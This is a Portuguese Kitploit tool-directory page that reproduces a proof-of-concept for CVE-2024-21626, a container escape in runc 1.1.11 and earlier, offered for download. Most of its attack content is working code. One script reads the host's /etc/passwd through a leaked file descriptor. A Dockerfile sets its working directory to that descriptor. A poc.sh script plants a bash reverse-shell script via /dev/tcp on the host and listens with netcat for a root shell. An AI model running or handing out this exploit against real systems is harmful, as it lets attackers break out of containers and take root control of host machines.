Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21626 — POC | Kitploit
Ferramentas/GitHubGitHub/kubernetesbachelor/cve-2024-21626
Escalada de PrivilégiosSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoRed TeamingEscape de Contêiner
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

Ver Repositório
25há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-21626

POC

Requisitos

runc 1.1.0 <= 1.1.11

Instalação do ambiente vulnerável

Implante uma VM com Ubuntu 20.04 e baixe o Docker seguindo o guia deles

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Altere a versão do 'runc' corrigida no Docker para uma vulnerável

Baixe uma versão vulnerável (runc 1.1.11 ou anterior) do repositório do runc no GitHub: https://github.com/opencontainers/runc/releases
Escolha runc.amd64 (requisito) runc_1111

Executando o exploit

Execute o script 'verify.sh'

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

Altere o diretório de trabalho no Dockerfile para o fd correto encontrado ao executar verify.sh

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

Construa um contêiner

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

Execute a imagem do contêiner e execute poc.sh em um shell bash

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

O contêiner entra em modo de escuta

lytte

Um novo script foi criado na raiz da máquina host chamado 'bash.copy' no diretório /proc/self/cwd/../../../bin/

bash

Tornando o script executável e executando-o...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... você obterá um reverse shell com privilégios de root na máquina host

root

Fonte

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

Baixar ferramenta